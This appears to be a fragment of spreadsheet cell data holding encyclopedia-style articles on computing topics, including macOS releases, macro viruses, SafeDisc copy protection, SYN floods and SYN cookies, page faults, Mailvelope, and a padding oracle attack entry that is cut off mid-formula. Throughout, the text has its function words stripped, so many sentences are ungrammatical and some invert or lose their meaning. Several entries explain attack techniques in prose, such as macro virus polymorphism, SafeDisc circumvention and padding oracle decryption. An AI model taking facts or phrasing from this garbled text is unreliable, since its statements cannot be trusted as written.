seen include game center, support imessage messages messaging application, reminders to-do list separate ical (which renamed calendar, like app). also includes support storing iwork documents icloud. notification center, makes debut mountain lion, desktop version similar higher. application pop-ups concentrated corner screen, center pulled right side screen. mountain lion also includes chinese features including support baidu option safari search engine, 163.com 126.com services mail, contacts calendar, youku, tudou sina weibo integrated share sheets.starting mountain lion, apple software updates (including distributed store. this updating mechanism replaced apple software update utility. 10.9 mavericks 10.9 mavericks released october 2013. free upgrade users running snow leopard later 64-bit intel processor. changes include addition previously ios-only maps ibooks applications, improvements notification center, enhancements several applications, many under-the-hood improvements. 10.10 yosemite 10.10 yosemite released october 2014. features redesigned user interface similar intended feature minimal, text-based 'flat' design, translucency effects intensely saturated colors. apple's showcase feature yosemite handoff, enables users iphones running later answer phone calls, receive send messages, complete unfinished iphone emails mac. 10.10.3, photos replaced iphoto aperture. 10.11 capitan 10.11 capitan released september 2015. similar 10.6 snow leopard, apple described release emphasizing "refinements experience" "improvements system performance". refinements include public transport built maps application, improvements notes application, adopting francisco system font clearer legib</t>
  </si>
  <si>
    <t>Machine-check exception</t>
  </si>
  <si>
    <t>machine-check exception (mce) type computer hardware error occurs computer's central processing unit detects hardware error processor itself, memory, devices, system bus; architectures, occurs unrecoverable error. architectures, machine-check exception caused software. however, architectures powerpc, certain software bugs invalid memory accesses cause machine-check exceptions. error usually occurs component failure overheating overclocking hardware components. most machine-check exceptions halt operating system require restart users continue normal operation. diagnosing failure often difficult little information caused problem captured error. modern versions microsoft windows ia-32 x86-64 processors handle machine-check exceptions windows hardware error architecture. when whea detects uncorrectable machine check exception, displays error blue screen death, following parameters (which vary, first parameter always machine check exception): stop: 0x00000124 (0x0000000000000000, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000) older versions windows handle similar exceptions machine check architecture. case, blue screen death show error similar following: stop: 0x0000009c (0x00000030, 0x00000002, 0x00000001, 0x80003cba) linux, process (such klogd) writes message kernel and/or console screen (usually console error non-recoverable machine crashes result): machine check exception: 0000000000000004 bank f200200000000863 kernel panic: context corrupt problem types most errors relate specifically pentium processor family. similar errors occur processors cause similar problems. some main hardware problems cause mces include: system errors: (error communicating processor motherboard). memory errors: parity checking detects memory error occurred. error correction code (ecc) correct limited memory errors processing continue. cache errors processor. possible causes machine checks hardware problem, software problem. they often result overclocking overheating. cases, shut passing thermal limit avoid permanent damage. also caused errors introduced failing components, like memory devices. possible causes include: poor cooling heatsink case fans filters) that's clogged dust come loose. overclocking beyond highest clock rate still reliable. failing motherboard. failing processor. failing memory. failing controllers, either motherboard separate cards. failing devices. inadequate failing power supply.cooling problems usually obvious upon inspection. failing motherboard processor identified swapping functioning parts. memory checked booting diagnostic tool, like memtest86. non-essential failing devices controllers identified unplugging possible disabling devices problem disappears. failures typically occur fairly soon booted days, suggestive power supply issue. with power supply problem, failure often occurs power demand peaks starts external devices use. decoding mces ia-32 intel processors, consult intel ia-32 architectures software developer's manual chapter (machine-check architecture), microsoft article windows exceptions. programs decode intel mces mcat: windows command-line program decode mces family 0x10 0x11 processors. mcelog linux daemon andi kleen handle mces modern processors. mcelog also decode machine checks. parsemce linux program dave jones decode mces processors. mced linux program hockin gather mces kernel alert interested applications. note interpret data, simply alerts programs. also machine check architecture blue screen death kernel panic notes references external links mcelog: advanced hardware error handling linux parsemce: linux machine check exception handler parser</t>
  </si>
  <si>
    <t>Macrium Reflect</t>
  </si>
  <si>
    <t>macrium reflect backup utility microsoft windows developed paramount software 2006. creates disk images file backup archives using microsoft volume shadow copy service ensure 'point time' data accuracy. macrium reflect back whole partitions individual files folders single compressed, mountable archive file, used restore exact images partitions hard disk disaster recovery, hard disk data migration.it received numerous favorable reviews, often recommended used example program cloning backup tutorials. overview macrium reflect create full, incremental differential backup images, selectively back individual files folders. data compressed encrypted real time using lz-based compression encryption algorithms. images mounted drive letter windows explorer restored using custom macrium reflect rescue event partial complete system loss, image used restore entire disk, partitions, individual files folders.macrium reflect clone disk onto another, restore image hardware. using pre-created macrium reflect rescue media (cd, memory stick), critical drivers required system inserted image taken system, making compatible hardware.macrium reflect image backups created older version (free paid editions) restored later version. macrium site manager central management console available enables scheduling, restore monitoring multiple networked computers running macrium reflect using browser user interface. free edition unsupported free edition available home commercial use. lacks features full versions, incremental backup (though includes differential backup), still features found expensive commercial products. references</t>
  </si>
  <si>
    <t>Palm OS viruses</t>
  </si>
  <si>
    <t>while viruses exist palm based devices, ever designed. typically, mobile devices difficult virus writers target, since simplicity provides fewer security holes target compared desktop. viruses palm references</t>
  </si>
  <si>
    <t>Macro and security</t>
  </si>
  <si>
    <t>macro computer science rule pattern specifies certain input sequence (often sequence characters) mapped replacement input sequence (also often sequence characters) according defined procedure. macro used define variables procedures, allow code reuse, design domain-specific languages. macros separated several types: text substitution macros language. macros software. software, sequence instructions associated keyboard mouse action. some software include programming language (like microsoft office) allowing control software features. other types macros covered article.macros useful software users. they simplify regularly used actions (repetitive code programmer, sequence actions program) productivity user increased. however, many problems exist, tackled subsequently. flaws macros viruses text substitution dangers there dangers text substitution macros, like macros. preprocessor powerful tool bring clarity code contrary, obscure hiding repeated evaluation macro common function defined evaluated twice used, although perusal calling code obvious. entities constants harmless; function calls repeated evaluation consume resources. worse, functions side effects, second evaluation lead unexpected results. bracketing arguments failure bracket arguments lead unexpected results. example, intended produce twice argument. double(x produce instead. solution bracket arguments: vba-type/winword macros flaws these flaws completely different previous ones main problem vba-type macros viruses. macro viruses relatively recent, first named concept, created june 1995. main reason high-level languages used write macro code powerful easy use, considerably increasing pool potential virus writers, documents containing macros disseminated rapidly widely e-mail. macro flaws spread quickly become destructive. different types macros viruses system macro viruses system macro means macros interact basic operators word document (like often-used functionalities like filesave, filesaveas macros). strength, weakness word document types macros redefined users. this allows user great flexibility, also flaw hackers exploit take control document computer word document opened. such type viruses automatic semi-automatic macros, launched action events without user's knowledge consent. example, word document following macros: autoexec, autonew, autoclose, autoopen, autoexit, easy hacker replace basic functionalities macro virus name original functionality. also, combination shortcut keys associated system command (like ctrl+b bold font) user change them, replacing custom macros. such, hacker modify create macros user activate using shortcut key. such macros also activated macro button, like button "click information" seems common innocuous. document-to-macro conversion type macro virus cuts pastes text document macro. macro could invoked auto-open macro text would re-created document (empty) opened. user notice document empty. macro could also convert parts text order less noticeable. removing macros document manually using anti-virus program could lead loss content document. 609–610 polymorphic macros polymorphic viruses change code fundamental ways replication order avoid detection anti-virus scanners. wordbasic (first name language visual basic), polymorphic viruses difficult indeed, macro's polymorphism relies encryption document. however, hackers control encryption key. furthermore, encryption inefficient: encrypted macros document, encryption polymorphic macro replicates itself, change (the replication affects macro encryption). addition difficulties, macro modify itself, another macro can. wordbasic powerful language, allows operations macros: rename variables used macro(s). insert random comments operators macro(s) insert operators macros other, ‘do-nothing’ wordbasic operators affect execution virus. replace operators others, equivalent ones, perform function. swap around operators order impact result macro’s execution. rename macro(s) new, randomly selected names time virus replicates document, appropriate changes parts virus body refer macros.so, order implement macros viruses change contents, hackers create another macro fulfills task modify content virus. however, type macro viruses widespread. indeed, hackers frequently choose macro viruses easy quick implement. making polymorphic macro requires knowledge wordbasic language needs advanced functionalities) time "classic" macro virus. even hacker make polymorphic macro, polymorphism needs done, document needs update update visible user.: 610–612 chained macros during replication, macro create do-nothing macros. idea combined polymorphic macros, macros necessarily do-nothing; macro invokes next one, arranged chain. case, removed disinfection, destructive payload activated. such attack crash winword processor internal error. since winword 6.0, number macros template limited 150, attack limited, too, still annoying. "mating" macro viruses macro viruses can, cases, interact themselves. viruses executed time, modify source code other. results virus recognize anti-viruses software. result totally random: macro virus infectious less infectious, depending upon part virus changed. however, 'mating' unintentional, resulting macro virus chances less infectious. indeed, order replicate itself, know commands source code, but, changed random scheme, macro replicate itself. nevertheless, possible macros intentionally different polymorphic macros viruses must another macro change contents) order increase infectivity viruses. example article,: 612–613 macro virus colors infected document, another infected user's system macro virus concept. both viruses command autoopen, first, macro virus colors detected command autoopen command macro virus concept. moreover, concept duplicates itself, unencrypted, command virus colors encrypted (colors encrypt commands). replication macro virus concept results hybridation macro virus (which infected user's system first) colors. "hybrid" could replicate autoopen executed; indeed command comes concept, body hybrid colors, create conflicts. this example shows potential mating macro viruses: couple mating macro viruses created, make difficult detect macro viruses hypothesis, viruses mate) virus-specific scanners reinforce virility viruses. fortunately, type macro virus rare (more polymorphic macro viruses, even exist), indeed, creating more) interact reduce virility (rather reinforce complicated. macro virus mutators among worst scenarios world viruses would tool allowing create virus modifying existing one. executable files, hard create kind tool. simple macro viruses since sources macros always available. based idea polymorphic macros, macro perform modifications macros present document. considering this, modifications make macro order convert macro virus mutator. easy create macro virus generators, thereby create quickly several thousands known viruses. 613–614 parasitic macro viruses most macros viruses stand-alone; depend macros (for infectious part virus, replication viruses), macros viruses they called parasitic macros.: 614–615 when launched, check macros (viruses not), append contents them. way, macros became viruses. but, type macro spread quickly stand-alone macros. indeed, depends macros, without them, virus spread. parasitic macros often hybrid: stand alone infect macros. this kind macro virus poses real problems virus-specific anti-virus; fact, change content viruses, accurate detection possible. suboptimal anti-virus there different types anti-virus scanners), heuristic analysis anti-virus interprets emulates macros. indeed, examine branches macros require np-complete complexity: (using backtracking), case, analysis document (which contains macros) would take much time. interpreting emulating macro would lead either false positive errors macro viruses detected. another type anti-virus, integrity checker anti-virus, cases, work: checks documents extensions (indeed, anti-virus producers suggest users), word documents reside others extensions two, content document tends change often.: like heuristic analysis, lead false positives errors, fact type anti-virus checks whole document.the last type anti-virus seen virus-specific scanner.: searches signature viruses, type anti-virus weaker previous ones. indeed, viruses detected virus-specific scanners ones known software producers (so, updates needed types scanners). moreover, type anti-virus weak morphing viruses (cf.section above). macro virus change content (so, signature), cannot detected virus-specific scanners, even virus actions. signature match declared virus scanner. additional responsibility anti-virus user's responsibility: potential macro virus detected, user choose ignore quarantine destroy last option dangerous. anti-virus activate destructive macro viruses destroy data deleted anti-virus. virus scanners users responsible security integrity documents/computer. moreover, even anti-virus optimal virus detection, macro viruses detected progression virus detection improves creation macro viruses. also macro (computer science) macro instruction macro-définition (french) references michael ernst; greg badros; david notkin (december 2002). empirical analysis preprocessor use". preprocessor, macros. steven ganz; sabry; walid taha (2001). "macros multi-stage computations: type-safe, generative, binding macros macroml". macro language. (10): 74–85. doi:10.1145/507669.507646. gerard holzmann. "the power rules developing safety critical code" (pdf). safety macros. william clinger; jonathan rees (1991). macros work. safety macros. 1–2. doi:10.1145/99583.99607. isbn 0897914198. s2cid 5340096. vesselin bontchev (1996). "possible macro virus attacks prevent them". virus, macros, safety macros. (7): 595–626. doi:10.1016/s0167-4048(97)88131-x. notes</t>
  </si>
  <si>
    <t>SafeDisc</t>
  </si>
  <si>
    <t>safedisc copy protection program microsoft windows applications games distributed optical disc. created macrovision corporation, aimed hinder unauthorized disc duplication. program first introduced 1998 discontinued march 2009.although stated prevent piracy, many, including electronic frontier foundation, believe used restrict one's fair-use rights. history there several editions safedisc years. each goals making discs harder copy. current revision marketed safedisc advanced. early versions safedisc make discs difficult copy. recent versions 2.9+ could produce discs difficult copy reverse engineer, requiring specific burners capable emulating "weak sectors" data formats characteristic safedisc. withdrawal support shortly release windows 2015, microsoft announced games safedisc would operating system, citing security concerns software becomes "deeply embedded" system. microsoft stated supporting safedisc could possible loophole computer viruses exploit. support safedisc earlier versions windows withdrawn upon release update number 3086255 2015. circumvention previous versions safedisc overcome disc image emulator software daemon tools alcohol 120%. safedisc currently blacklists software, meaning want method must install additional software cloak mounter; examples include curerom y.a.s.u. another potential attack safedisc pull encrypted application archive contained safedisc encrypted discs contain file, encrypted format used safedisc ensure original loaded. unsafedisc circumvents decrypts safedisc encrypted files opening file format, decrypting converting file. however, program requires specific patch enable full functionality. operation safedisc adds unique digital signature optical media time replication. each time safedisc-protected program runs, safedisc authenticator performs various security checks verifies safedisc signature optical media. authentication process takes seconds. once verification established, sequence complete program start normally. safedisc signature designed difficult copy transfer original media. (for example, might change result error correction copying process.) certain multimedia programs designed pc's hard drive without accessing files program disc initial installation. safedisc permit long consumer retains original dvd, required authentication time program launched. failure place original disc drive loading program prevent validation safedisc signature. version history safedisc (v1) (1998–2001) safedisk protected recognized several files 00000001.tmp clcd16.dll clcd32.dll clokspl.exe dplayerx.dlland also existence files game.exe game.icd (where game replaced actual game's name). executable loader decrypts loads protected game executable encrypted file. initial version safedisc easy home users professional duplicators alike copy, fact file decrypted converted file. safedisc (v2) (november 2000–2003) following files exist every original 00000001.tmp 00000002.tmp (not always present)the loader file (game.exe) integrated main executable, making game.icd file obsolete. also clokspl.exe file, present safedisc longer exists. version found inside game.exe file string: bog_ *90.0&amp;!! yy&gt;, followed three unsigned longs, version, subversion revision numbers hex). when making backup, read errors encountered sectors 806–10663. protection also "weak" sectors, introduced version, causes synchronization problems certain cd-writers. digital signatures still present version. effect disc images mounted daemon tools similar programs. addition, safedisc version 2.50 added atip detection making impossible copy burner unless software masks used (clonecd ability this.) safedisc versions 2.90 make burning copies difficult requiring burners capable burning "weak sectors"; drives uncommon. however, software solutions eliminate need specialized hardware. safedisc (v3) (2003–2005) safedisc uses encrypt main executable (exe dll) creates corresponding digital signature added cd-rom/dvd-rom replicated. size digital signature varies depending good encryption must authentication process takes seconds. safedisc capable encrypting multiple executables cds/dvds, long executables encrypted digital signature added media. safedisc supports virtual drives long original cd/dvd available. once authenticated game continue virtual drive, provided virtual drive software blacklisted. clonecd able make fair copies safedisc (v4) (2005–2008) final major safedisc version version released february 2005. lost ground securom time, final build version 4.90.010 2008; product discontinued march 2009. safedisc driver vulnerabilities november 2007; microsoft stated "there vulnerability macrovision secdrv.sys driver windows could allow elevation privilege. this vulnerability patched microsoft december 2007 this vulnerability affect windows vista. driver, secdrv.sys, used games macrovision safedisc. without driver, games safedisc protection would unable play windows". ultimately, would prove factors would lead drop support program 2015. also securom cd-cops tages laserlock y.a.s.u. references external links safedisc product description safedisc explained safedisc explained weak sectors explained weak sector utility</t>
  </si>
  <si>
    <t>Sadmind</t>
  </si>
  <si>
    <t>sadmind worm computer worm exploited vulnerabilities microsystems' solaris (security bulletin 00191) microsoft's internet information services (ms00-078), patch made available seven months earlier. discovered 2001. worm defaced servers message united states government anti-chinese cracking group poizonbox. systems affected version microsoft (iis): version version 5.0sun microsystems (solaris): version version also timeline computer viruses worms comparison computer viruses computer viruses references external links cert advisory ca-2001-11 cert vulnerability note vu#28934 symantec rates sadmind/iis worm severity risk impact security vulnerability resulting from worm exploit rated high solaris worm attacks servers</t>
  </si>
  <si>
    <t>SVISTA</t>
  </si>
  <si>
    <t>svista (serenity virtual station) former commercial virtual machine software product marketed serenity systems international. windows, os/2, linux freebsd hosted versions available.this product longer available supported. description svista developed contract parallels software studio based existing twoostwo software, although os/2 freebsd hosted versions specific svista. providing virtualization product initially part serenity's strategy marketing ecomstation operating system. when os/2 port connectix virtualpc discontinued following acquisition creator microsoft, serenity contracted parallels develop svista alternative. beta program launched spring 2004, general availability release october year.however, product discontinued shortly afterwards following acquisition parallels swsoft. according john serenity systems, swsoft interested continuing development svista, withdrew contract.although serenity briefly expressed interest finding another solution os/2 hosted virtualization product, eventually deemed impractical increased competition consumer market microsoft vmware.the former product website currently indicates svista longer available, suggests virtual bridges virtualbox possible third-party alternatives. issues when using svista instances environment addresses used unique identifiers (uid), advisable manually configure address virtual machine ensure actually unique. example environment security enabled switches another example environment altiris products used configured address uid). situation, simply disable networks/adapters bridged edit virtual machine's configuration (.2os) file change 'mac address' unique. current status first release svista 2004, released october 2004. final release svista feature release beta made available registered customers 2005. also twoostwo parallels workstation vmware user-mode linux comparison platform virtualization software external links serenity virtual references</t>
  </si>
  <si>
    <t>SYSV checksum</t>
  </si>
  <si>
    <t>sysv checksum algorithm commonly used, legacy checksum algorithm. implemented unix system also available command line utility. this algorithm useless security perspective, weaker crc-32 cksum error detection. description algorithm main part algorithm simply adding bytes 32-bit sum. result, algorithm characteristics simple sum: re-arranging bytes another order (e.g. moving text place another place) change checksum. increasing byte decreasing another byte amount change checksum. adding removing zero bytes change checksum.as result, many common changes text data detected method. freebsd pseudocode algorithm last part folds value bits. references sources official manual page coreutils download page find unpack newest version coreutils package, read src/sum.c</t>
  </si>
  <si>
    <t>SYN flood</t>
  </si>
  <si>
    <t>flood form denial-of-service attack attacker rapidly initiates connection server without finalizing connection. server spend resources waiting half-opened connections, consume enough resources make system unresponsive legitimate traffic.the packet attacker sends packet, part tcp's three-way handshake used establish connection. technical details when client attempts start connection server, client server exchange series messages normally runs like this: client requests connection sending (synchronize) message server. server acknowledges request sending syn-ack back client. client responds ack, connection established.this called three-way handshake, foundation every connection established using protocol. flood attack works responding server expected code. malicious client either simply send expected ack, spoofing source address syn, cause server send syn-ack falsified address send "knows" never sent syn. server wait acknowledgement time, simple network congestion could also cause missing ack. however, attack, half-open connections created malicious client bind resources server eventually exceed resources available server. point, server cannot connect clients, whether legitimate otherwise. this effectively denies service legitimate clients. some systems also malfunction crash operating system functions starved resources way. countermeasures there number well-known countermeasures listed 4987 including: filtering increasing backlog reducing syn-received timer recycling oldest half-open cache cookies hybrid approaches firewalls proxies also fraggle attack internet control message protocol address spoofing ping flood smurf attack flood attack references external links official cert advisory attacks</t>
  </si>
  <si>
    <t>SYN cookies</t>
  </si>
  <si>
    <t>cookie technique used resist flood attacks. technique's primary inventor daniel bernstein defines cookies "particular choices initial sequence numbers servers." particular, cookies allows server avoid dropping connections queue fills instead storing additional connections, queue entry encoded sequence number sent syn+ack response. server receives subsequent response client incremented sequence number, server able reconstruct queue entry using information encoded sequence number proceed usual connection. implementation order initiate connection, client sends packet server. response, server sends syn+ack packet back client. values packet sequence number, used reassemble data stream. according specification, first sequence number sent endpoint value decided endpoint. sequence number chosen sender, returned recipient, otherwise-defined internal structure, overloaded carry additional data. following describes possible implementation, however public standard follow, order, length, semantics fields differ cookie implementations. cookies initial sequence numbers carefully constructed according following rules: slowly incrementing timestamp (typically time() logically right-shifted positions, gives resolution seconds) maximum segment size (mss) value server would stored queue entry result cryptographic hash function computed server address port number, client address port number, value returned value must 24-bit value.the initial sequence number, i.e. cookie, computed follows: bits: middle bits: encoded value representing bottom bits: s(note: since must encoded using bits, server restricted sending unique values cookies use.) when client sends back packet server response server's syn+ack packet, client must (according spec) packet's acknowledgement number, initial sequence number sent server. server subtracts acknowledgement number reveal cookie sent client. server performs following operations. checks value current time connection expired. recomputes determine whether indeed, valid cookie. decodes value 3-bit encoding cookie, reconstruct queue entry.from point forward, connection proceeds normal. drawbacks cookies break protocol specifications, therefore compatible implementations. there are, however, caveats take effect cookies use. firstly, server limited unique values, encoded bits. secondly, early implementations rejected options (such large windows timestamps), server discarded queue entry information would otherwise stored.; however v2.6.26 linux kernel added partial support options encoding timestamp option. finally, cookies place increased load server resources. encrypting responses computationally expensive. cookie reduce traffic, makes ineffective flooding attacks target bandwidth attack vector. while restrictions necessarily lead sub-optimal experience, effect rarely noticed clients applied attack. situation, loss options order save connection usually considered reasonable compromise. problem arises connection-finalizing packet sent client lost, application layer protocol requires server speak first (smtp examples). case, client assumes connection established successfully waits server send protocol banner, resend syn+ack packet; however, server aware session resend syn+ack discarded backlog queue entry would enable eventually, client abort connection application layer timeout, take relatively long time.tcp cookie transactions (tcpct) standard designed overcome shortcomings cookies improve couple aspects. unlike cookies, tcpct extension required support endpoints. moved "historic" status 7805 2016. security considerations simple firewalls configured allow outgoing connections restrict ports incoming connection reach (for example, allow incoming connections server port restrict ports), work blocking incoming requests unwanted ports. cookies operation, care taken ensure attacker able bypass firewall forging acks instead, trying random sequence numbers accepted. cookies switched per-port basis, cookies enabled public port cause recognised non-public port. original linux kernel implementation misunderstood part bernstein's description used single global variable switch cookies ports; pointed research student subsequently fixed cve-2001-0851. history technique created daniel bernstein eric schenk september 1996. first implementation (for sunos) released jeff weisberg month later, eric schenk released linux implementation february 1997. freebsd implements syncookies since freebsd (january 2002). also flood spoofing cookie transactions references external links bernstein's explanation cookies 4987 appendix</t>
  </si>
  <si>
    <t>Page fault</t>
  </si>
  <si>
    <t>computing, page fault (sometimes called hard fault) exception memory management unit (mmu) raises process accesses memory page without proper preparations. accessing page requires mapping added process's virtual address space. besides, actual page contents need loaded backing store, disk. detects page fault, operating system's kernel handles exception making required page accessible physical memory denying illegal memory access. valid page faults common necessary increase amount memory available programs operating system utilizes virtual memory, windows, macos, linux kernel. types minor page loaded memory time fault generated, marked memory management unit loaded memory, called minor soft page fault. page fault handler operating system merely needs make entry page memory management unit point page memory indicate page loaded memory; need read page memory. this could happen memory shared different programs page already brought memory programs. page could also removed working process, written disk erased, operating systems secondary page caching. example, openvms remove page need written disk remained unchanged since last read disk, example) place free page list working deemed large. however, page contents overwritten page assigned elsewhere, meaning still available referenced original process allocated. since faults involve disk latency, faster less expensive major page faults. major this mechanism used operating system increase amount program memory available demand. operating system delays loading parts program disk program attempts page fault generated. page loaded memory time fault, called major hard page fault. page fault handler needs find free location: either free page memory, non-free page memory. this latter might used another process, case needs write data page written since last modified) mark page loaded memory process page table. once space made available, read data page memory, entry location memory management unit, indicate page loaded. thus major faults expensive minor faults storage access latency interrupted program's execution. invalid page fault occurs reference address part virtual address space, meaning cannot page memory corresponding called invalid page fault. page fault handler operating system generally pass segmentation fault offending process, indicating access invalid; usually results abnormal termination code made invalid reference. null pointer usually represented pointer address address space; many operating systems indicate page contains address memory, include page virtual address space, attempts read write memory referenced null pointer invalid page fault. invalid conditions illegal accesses invalid page faults result segmentation fault error, resulting crash. software bugs often causes problems, hardware memory errors, caused overclocking, corrupt pointers cause healthy codes fail. operating systems provide differing mechanisms reporting page fault errors. microsoft windows uses structured exception handling report invalid page faults access violation exceptions. unix-like systems typically signals, sigsegv, report error conditions programs. program receiving error handle operating system performs default action, typically involving termination running process caused error condition, notifying user program malfunctioned. windows often reports crashes without going details. experienced user retrieve detailed information using windbg minidump windows creates crash. unix-like operating systems report conditions error messages "segmentation violation" "bus error", produce core dump. performance impact page faults degrade system performance cause thrashing. major page faults conventional computers using hard disk drives significant impact performance, average hard disk drive average rotational latency seek time transfer time 0.05 ms/page. therefore, total time paging near 8,000 μs). memory access time page fault would make operation 40,000 times slower. performance optimization programs operating systems often involves reducing number page faults. primary focuses optimization reducing overall memory usage improving memory locality. reduce page faults, developers must appropriate page replacement algorithm maximizes page hits. many proposed, implementing heuristic algorithms reduce incidence page faults. larger physical memory also reduces page faults. also bélády's anomaly page (computer memory) segmentation fault notes references external links what page fault?(subscription required)" online windows-specific explanation) "virtual memory details" website. "unhandledexceptionfilter (windows)" msdn online. "page fault overhead" information page faults crucially affect processing time.</t>
  </si>
  <si>
    <t>Paessler PRTG</t>
  </si>
  <si>
    <t>prtg (paessler router traffic grapher version agentless network monitoring software paessler several software versions combined umbrella term paessler prtg. monitor classify system conditions like bandwidth usage uptime collect statistics miscellaneous hosts switches, routers, servers devices applications.the first version prtg released 2003 german company paessler gmbh (now: paessler ag), founded dirk paessler 2001. products paessler prtg family monitoring software paessler prtg available three versions. addition classic standalone solution prtg network monitor, paessler sells prtg enterprise monitor large distributed networks prtg hosted monitor saas-version. prtg network monitor prtg network monitor classic on-premise monitoring solution, hosted server user's network. installation core server, computer windows server operating system required. prtg enterprise monitor since 2020, paessler offered prtg enterprise monitor, specialized monitoring solution large environments. addition particularly high performance distributed locations, prtg enterprise monitor also includes itops board, provides centralized service-oriented overview. used business processes, consolidate dashboards multiple servers, monitor performance availability, among features. prtg hosted monitor 2017, cloud-hosted version prtg released. prtg hosted monitor offers largely range functions standard tool. license billed monthly based solely number sensors. contrast prtg network monitor prtg enterprise monitor, prtg hosted monitor also used networks without windows server, since hosted cloud locally. specifications paessler prtg auto-discovery mode scans predefined areas enterprise network creates device list data. next step, information detected devices retrieved using various communication protocols. typical protocols icmp, snmp, wmi, netflow, jflow, sflow, also communication dicom restful possible. sensors software based sensors configured specific purpose. prtg sensor single metric device. instance, managing switch, sensor could measuring network health, whether switch's utilization running 90%. most devices require five sensors fully monitored. there http, smtp/pop3 (e-mail) application sensors hardware-specific sensors switches, routers servers. prtg network monitor different predefined sensors retrieve statistics monitored instances, e.g. response times, processor, memory, database information, temperature system status. interface desktop client software operated completely ajax-based interface. interface suitable real-time troubleshooting data exchange non-technical staff maps (dashboards) user-defined reports. additional administration interface form desktop application windows, linux macos available. notifications reports addition usual communication channels email sms, notification also provided push notification smartphones using android. paessler prtg also offers customizable reports. pricing paessler prtg's licensing based sensors. version integrated sensors available free charge prtg network monitor. also comparison network monitoring systems references external links official website literature andrés, steven, brian kenyon, erik pack birkholz. security sage's guide hardening network infrastructure. elsevier, 2004. elsayed, abdellatief, nashwa abdelbaki. "performance evaluation comparison market virtualization hypervisors." computer engineering systems (icces), 2013 international conference ieee, 2013.</t>
  </si>
  <si>
    <t>SWIPSY</t>
  </si>
  <si>
    <t>swipsy firewall toolkit produced defence evaluation research agency (later qinetiq). swipsy toolkit itsec (equivalent common criteria eal4) evaluated product allowed additional code added security ‘compartments’ without affecting evaluation status toolkit itself. swipsy security properties assured network process separation. particular processes communicating network could communicate directly network ‘trusted mover agents’ turn force data passed format content checkers. swipsy trusted solaris platform, utilising mandatory access controls enforce separation compartments. swipsy, stood switch securely, used build snmp firewall system called midass.swipsy technology licensed clearswift deep-secure line guard products.swipsy used basis guard citrix protocol qinetiq. references</t>
  </si>
  <si>
    <t>Mailvelope</t>
  </si>
  <si>
    <t>mailvelope free software end-to-end encryption email traffic inside browser (firefox, chromium edge) integrates existing webmail applications ("email websites"). used encrypt sign electronic messages, including attached files, without separate, native email client (like thunderbird) using openpgp standard. name portmanteau words "mail" "envelope". published together source code terms version affero general public license (agpl). company mailvelope gmbh runs development using public code repository github. development sponsored open technology fund internews.similar alternatives mymail-crypt webpg. features mailvelope equips webmail applications openpgp functionality. support several popular providers like gmail, yahoo, outlook others preconfigured. webmail software roundcube senses supports mailvelope version 2016, well (self-hosted) webmail clients. chromium/chrome there's possibility install authenticated source using integrated software extension manager "chrome store". addition, mailvelope also available firefox microsoft edge add-on. mailvelope works according openpgp standard, public-key cryptosystem first standardized 1998 written javascript. preset user-authorized pages overlays page control elements, optically distinguished separate application surrounding security-background. this background customized detect impersonations. encryption relies functionality program library openpgp.js, free javascript implementation openpgp standard. running inside separate inline frame, code executed separately application prevent accessing clear text message contents.the integration mailvelope api, developed collaboration united internet, allows deeper integration webmail service mailvelope components. thus, setup generation pair done directly webmailer using wizard. mailvelope manages openpgp keys locally browser. since version 3.0, local gnupg installation included mailvelope's management, allowing users native applications desired. history usage thomas oberndörfer started developing mailvelope spring 2012 first public version 0.4.0.1 released august global surveillance disclosure raised questions security private business email communication. time, e-mail encryption openpgp considered complicated use. moreover, webmail services particularly popular private individuals offer end-to-end encryption functions. this various mentions mailvelope press possible solution problem.mario heiderich krzysztof kotowicz cure53 security audit alpha version 2012/2013. among things, separation application data structures improved based findings. february 2014, group analysed library openpgp.js mailvelope based version 0.8.0, released following april, adopted resulting fixes added support message signing. 2014, isec partners published analysis firefox extension. version 1.0.0 published august 2015. april 2015, de-mail providers equipped services default disabled option end-to-end encryption based mailvelope, could used combination mobile german electronic identity card. version extension released 2015. august 2015, email services web.de introduced support openpgp encryption integrated mailvelope webmail applications that. according company's information, option encrypt e-mails available around million users.a 2015 study examined usability mailvelope example modern openpgp client deemed unsuitable masses. they recommended integrating assistant functionality, sending instructive invitation messages communication partners, publishing basic explanatory texts. mailvelope-based openpgp system united internet integrates functionality usability earned positive mentions press, particularly offered synchronization feature. usability analysis 2016 found still "worthy improvement" ("verbesserungswürdig"), though, mentioned "confusing wording" ("irritierende formulierungen"), missing communication concept, password recommendations, missing negative dissociation prominent modus features transport encryption, plus insufficient support authenticity checking thwart man-in-the-middle attacks).mailvelope enhanced 2018/19 part initiative. overall, "key management simplified, security software improved." security vulnerabilities mailvelope source code, well openpgp.js program library used, brought light security audit conducted consult closed. according bsi, goal project also enable website operators offer contact forms future securely encrypt messages user's browser recipient. import keys would https-encrypted using (web directory) protocol. references external links official website mailvelope github</t>
  </si>
  <si>
    <t>Padding oracle attack</t>
  </si>
  <si>
    <t>cryptography, padding oracle attack attack uses padding validation cryptographic message decrypt ciphertext. cryptography, variable-length plaintext messages often padded (expanded) compatible underlying cryptographic primitive. attack relies "padding oracle" freely responds queries whether message correctly padded not. padding oracle attacks mostly associated mode decryption used within block ciphers. padding modes asymmetric algorithms oaep also vulnerable padding oracle attacks. symmetric cryptography symmetric cryptography, padding oracle attack applied mode operation, "oracle" (usually server) leaks data whether padding encrypted message correct not. such data allow attackers decrypt (and sometimes encrypt) messages oracle using oracle's key, without knowing encryption key. padding oracle attack encryption standard implementation decryption block ciphers decrypt ciphertext blocks, validate padding, remove pkcs7 padding, return message's plaintext. server returns "invalid padding" error instead generic "decryption failed" error, attacker server padding oracle decrypt (and sometimes encrypt) messages. mathematical formula decryption {\displaystyle p_{i}=d_{k}(c_{i})\oplus c_{i-1},} {\displaystyle c_{0}=iv.} depicted above, decryption xors plaintext block previous block. result, single-byte modification block {\displaystyle c_{1}} make corresponding change single byte {\displaystyle p_{2}} suppose attacker ciphertext blocks {\displaystyle c_{1},c_{2}} wants decrypt second block plaintext {\displaystyle p_{2}} attacker changes last byte {\displaystyle c_{1}} (creating {\displaystyle c_{1}'} sends {\displaystyle (iv,c_{1}',c_{2})} server. server returns whether padding last decrypted block {\displaystyle p_{2}'} correct valid pkcs#7 padding). padding correct, attacker knows last byte {\displaystyle d_{k}(c_{2})\oplus c_{1}'} {\displaystyle \mathrm {0x01} last bytes 0x02, last three bytes 0x03, last eight bytes 0x08. attacker modify second-last byte (flip bit) ensure last byte 0x01. (alternatively, attacker flip earlier bytes binary search position identify padding. example, modifying third-last byte correct, modifying second-last byte incorrect, last bytes known 0x02, allowing decrypted.) therefore, last byte {\displaystyle 